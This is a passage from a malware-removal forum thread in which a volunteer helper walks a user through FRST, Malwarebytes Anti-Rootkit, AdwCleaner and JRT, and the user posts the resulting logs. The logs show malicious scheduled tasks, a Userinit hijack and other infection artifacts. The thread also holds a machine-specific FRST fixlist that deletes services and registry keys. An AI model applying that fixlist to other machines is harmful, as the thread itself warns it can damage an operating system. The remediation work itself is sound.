CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File

EmptyTemp:
end


NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system

Run FRST / FSRT64 again like we did before but this time press the Fix button just once and wait.
The tool will make a log (Fixlog.txt) please post it to your reply.

---

:step2: Run Malwarebytes Anti-Rootkit again: Right-click mbar.exe and select Run As Administrator
  • Scan your system for malware
  • If malware is found, click on the Cleanup
  • button to remove any threats and reboot if prompted to do so.
  • Wait while the system shuts down and the cleanup process is performed.
  • then please go to the MBAR folder and then copy/paste the contents of the MBAR-log-***.txt file to your next reply.
  • If there is no malware found, please let me know as well.

***


:step3: Double click on AdwCleaner.exe to run the tool again.
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer like it did before.
  • When the scan has finished, the actual line should say "Pending. Please uncheck elements you do not want to remove". Look through the scan results and uncheck any entries that you do not wish to remove.
  • This time, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[C#].txt) will open automatically (where the largest value of # represents the most recent report).
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

***


:step4: Please download Junkware Removal Tool from HERE and save it to your desktop.
Shutdown your antivirus to avoid any potential conflicts.
Double click JRT.exe to run the tool.
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • JRT will begin to backup your registry and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, the log JRT.txt is saved on your desktop and will automatically open.
Enable your antivirus!
Post the contents of JRT.txt into your next reply.




***


:step5: How the computer is running now?

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.

#11 Ronins8

Ronins8
  • Topic Starter

  • Members
  • 22 posts
  • OFFLINE
    •  
  • Local time:02:32 PM

Posted 16 April 2016 - 03:20 PM

:step1:

Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-15 18:44:31) Run:5
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
S3 MFE_RR; \??\C:\Users\RoNiN\AppData\Local\Temp\mfe_rr.sys [X]
2016-03-11 19:25 - 2016-04-09 16:22 - 00000368 ____H C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job 
2016-03-11 19:25 - 2016-04-09 16:22 - 00000356 _____ C:\WINDOWS\Tasks\BJZJKCUBLH1.job 
2016-03-11 19:25 - 2016-03-11 19:25 - 00003444 _____ C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC 
2016-03-11 19:25 - 2016-03-11 19:25 - 00002928 _____ C:\WINDOWS\System32\Tasks\BJZJKCUBLH1
Task: {369CA7CD-5C89-4F7B-834D-8F15564BB1DC} - System32\Tasks\Rocfokt => C:\PROGRA~1\SHOPPE~1\Balditii.bat 
C:\PROGRA~1\SHOPPE~1
Task: {AF19F91F-CBDD-4187-8FA0-9B762E84BFB5} - System32\Tasks\Lhsorj => C:\PROGRA~1\GROOVE~1\Jascusjh.bat
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0] 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
 
EmptyTemp:
end
*****************
 
Restore point was successfully created.
Processes closed successfully.
MFE_RR => service removed successfully
"C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job" => not found.
"C:\WINDOWS\Tasks\BJZJKCUBLH1.job" => not found.
"C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC" => not found.
"C:\WINDOWS\System32\Tasks\BJZJKCUBLH1" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{369CA7CD-5C89-4F7B-834D-8F15564BB1DC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{369CA7CD-5C89-4F7B-834D-8F15564BB1DC}" => key removed successfully
C:\WINDOWS\System32\Tasks\Rocfokt => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Rocfokt" => key removed successfully
"C:\PROGRA~1\SHOPPE~1" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF19F91F-CBDD-4187-8FA0-9B762E84BFB5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF19F91F-CBDD-4187-8FA0-9B762E84BFB5}" => key removed successfully
C:\WINDOWS\System32\Tasks\Lhsorj => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lhsorj" => key removed successfully
"C:\Users\RoNiN\Desktop\Natephotobomb.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\RoNiN\Desktop\Natephotobomb.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\RoNiN\Desktop\Natephotobomb.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\RoNiN\Downloads\BBKings Everclear.png" => ":SummaryInformation" ADS not found.
"C:\Users\RoNiN\Downloads\BBKings Everclear.png" => ":Updt_SummaryInformation" ADS not found.
C:\Users\RoNiN\Downloads\BBKings Everclear.png => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\RoNiN\Downloads\wddrnote.gif" => ":SummaryInformation" ADS not found.
C:\Users\RoNiN\Downloads\wddrnote.gif => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\RoNiN\Downloads\wdid.gif" => ":SummaryInformation" ADS not found.
C:\Users\RoNiN\Downloads\wdid.gif => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}" => key removed successfully
EmptyTemp: => 76.6 MB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 18:45:19 ====
:step2:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
 
Database version:
  main:    v2016.04.16.03
  rootkit: v2016.04.09.01
 
Windows 10 x64 NTFS
Internet Explorer 11.0.10240.16724
RoNiN :: RONIN-LAPTOP [administrator]
 
4/16/2016 12:08:20 PM
mbar-log-2016-04-16 (12-08-20).txt
 
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 444647
Time elapsed: 1 hour(s), 20 minute(s), 
 
Memory Processes Detected: 0
(No malicious items detected)
 
Memory Modules Detected: 0
(No malicious items detected)
 
Registry Keys Detected: 0
(No malicious items detected)
 
Registry Values Detected: 0
(No malicious items detected)
 
Registry Data Items Detected: 1
HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON|userinit (Hijack.UserInit) -> Bad: (wscript,) Good: (userinit.exe) -> Replace on reboot. [86fd555a3d5cfe38743141fbbe4757a9]
 
Folders Detected: 0
(No malicious items detected)
 
Files Detected: 0
(No malicious items detected)
 
Physical Sectors Detected: 0
(No malicious items detected)
 
(end)
 

:step3:

# AdwCleaner v5.111 - Logfile created 16/04/2016 at 13:35:58
# Updated 14/04/2016 by Xplode
# Database : 2016-04-15.1 [Server]
# Operating system : Windows 10 Home  (X64)
# Username : RoNiN - RONIN-LAPTOP
# Running from : C:\Users\RoNiN\Downloads\adwcleaner_5.111.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
 
***** [ DLLs ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cloudfront.net
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\d21r4q0rdzodf.cloudfront.net
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\d3s8xk3etjyeyz.cloudfront.net
 
***** [ Web browsers ] *****
 
 
*************************
 
:: "Tracing" keys deleted
:: Winsock settings cleared
 
*************************
 
C:\AdwCleaner\AdwCleaner[C1].txt - [20165 bytes] - [07/04/2016 16:19:41]
C:\AdwCleaner\AdwCleaner[C2].txt - [3710 bytes] - [09/04/2016 16:19:56]
C:\AdwCleaner\AdwCleaner[C3].txt - [1130 bytes] - [16/04/2016 13:35:58]
C:\AdwCleaner\AdwCleaner[S1].txt - [20704 bytes] - [07/04/2016 16:15:59]
C:\AdwCleaner\AdwCleaner[S2].txt - [885 bytes] - [07/04/2016 16:30:45]
C:\AdwCleaner\AdwCleaner[S3].txt - [957 bytes] - [07/04/2016 16:46:57]
C:\AdwCleaner\AdwCleaner[S4].txt - [1029 bytes] - [07/04/2016 17:52:54]
C:\AdwCleaner\AdwCleaner[S5].txt - [1103 bytes] - [08/04/2016 13:20:32]
C:\AdwCleaner\AdwCleaner[S6].txt - [3331 bytes] - [08/04/2016 23:29:09]
C:\AdwCleaner\AdwCleaner[S7].txt - [3404 bytes] - [09/04/2016 16:11:57]
C:\AdwCleaner\AdwCleaner[S8].txt - [1685 bytes] - [16/04/2016 13:34:22]
 
########## EOF - C:\AdwCleaner\AdwCleaner[C3].txt - [1786 bytes] ##########
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.4 (03.14.2016)
Operating System: Windows 10 Home x64 
Ran by RoNiN (Administrator) on Sat 04/16/2016 at 13:47:23.39
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 10 
 
Successfully deleted: C:\ProgramData\28341ff220e0446c9fff27c4493d622e (Folder) 
Successfully deleted: C:\Users\RoNiN\AppData\Local\crashrpt (Folder) 
Successfully deleted: C:\Users\RoNiN\AppData\Local\installer (Folder) 
Successfully deleted: C:\Users\RoNiN\Appdata\LocalLow\company (Folder) 
Successfully deleted: C:\WINDOWS\SysWOW64\sho8AC4.tmp (File) 
Successfully deleted: C:\WINDOWS\SysWOW64\sho990F.tmp (File) 
Successfully deleted: C:\WINDOWS\SysWOW64\shoAF67.tmp (File) 
Successfully deleted: C:\WINDOWS\SysWOW64\shoF11A.tmp (File) 
Successfully repaired: C:\Users\RoNiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a41ce5b91aa3166e\MightyText - SMS from PC & Text from Computer.lnk (Shortcut)
Successfully repaired: C:\Users\RoNiN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk (Shortcut)
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 04/16/2016 at 13:51:13.60
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:step5:Running smooth!!  Windows defender is still locked due to 'group policy'

#12 Jo*

Jo*

  • Malware Response Team
  • 3,445 posts
  • OFFLINE
    •  
  • Gender:Male
  • Location:Germany
  • Local time:02:32 PM

Posted 16 April 2016 - 04:10 PM

Download and run Chrome Software Cleaner

---

Why do you think you have Komodia Rootkit?

Did you uninstall Emsisoft Anti-Malware?

Your logs show 4 user profiles: Which of these user accounts did you create?
Available Profiles:
- RoNiN
- postgres
- DefaultAppPool
- Mcx1-RONIN-LAPTOP

Which user accounts can you see in the User Accounts control panel?

---

Log on to all your user accounts now - without restarting !

FRST / FSRT64: run it again.
  • Right-click FRST / FSRT64 then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Put a check into the box next to Addition.txt and press the Scan button.
  • When finished, it will produce logs called FRST.txt and Addition.txt in the same directory the tool was run from.
  • Please copy and paste both logs in your next reply.
---

Download Security Check by screen317 from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
    Vista / Windows 7/8 users right-click and select Run As Administrator.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

Edited by Jo*, 16 April 2016 - 04:53 PM.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.

#13 Ronins8

Ronins8
  • Topic Starter

  • Members
  • 22 posts
  • OFFLINE
    •  
  • Local time:02:32 PM

Posted 30 April 2016 - 01:10 PM

Hi Jo,

 

1) I thought it was Komodia because originally malwarebytes and a few others were reporting it on my pc but after each clean it would remain there. komodia rootkit

2) Yes I had uninstalled as my system resources kept running low and I was getting warnings

3) RoNiN is the account I created

4)I only see 1 user account in my profile - RONIN-LAPTOP/RoNiN

5)

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by RoNiN (administrator) on RONIN-LAPTOP (30-04-2016 14:03:36)
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MSIService.exe
(MAGIX AG) C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Thrustmaster®) C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10816544 2010-05-25] (Realtek Semiconductor)
HKLM\...\Run: [THXCfg64] => C:\windows\system32\RunDLL32.exe C:\windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [MGSysCtrl] => C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe [2486272 2010-06-04] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [THX Audio Control Panel] => C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe [1349632 2010-05-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [TkBellExe] => "C:\Users\RoNiN\update\realsched.exe"  -osboot
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [407904 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153952 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\WINDOWS\SYSTEM32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [Google Update] => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [SideSync] => C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe [9580864 2015-10-13] ()
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [MusicManager] => C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\MusicManager.exe [7643136 2015-11-17] (Google Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog5 01 C:\WINDOWS\SysWOW64\NLAapi.dll [64000 2015-07-09] (Microsoft Corporation)ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 02 C:\WINDOWS\SysWOW64\napinsp.dll [54784 2015-07-09] (Microsoft Corporation)ATTENTION: LibraryPath should be "%SystemRoot%\system32\napinsp.dll"
Winsock: Catalog5 03 C:\WINDOWS\SysWOW64\pnrpnsp.dll [70144 2015-07-09] (Microsoft Corporation)ATTENTION: LibraryPath should be "%SystemRoot%\system32\pnrpnsp.dll"
Winsock: Catalog5 04 C:\WINDOWS\SysWOW64\pnrpnsp.dll [70144 2015-07-09] (Microsoft Corporation)ATTENTION: LibraryPath should be "%SystemRoot%\system32\pnrpnsp.dll"
Winsock: Catalog5 05 C:\WINDOWS\SysWOW64\mswsock.dll [306528 2015-07-10] (Microsoft Corporation)ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 06 C:\WINDOWS\SysWOW64\winrnr.dll [23552 2015-07-09] (Microsoft Corporation)ATTENTION: LibraryPath should be "%SystemRoot%\System32\winrnr.dll"
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
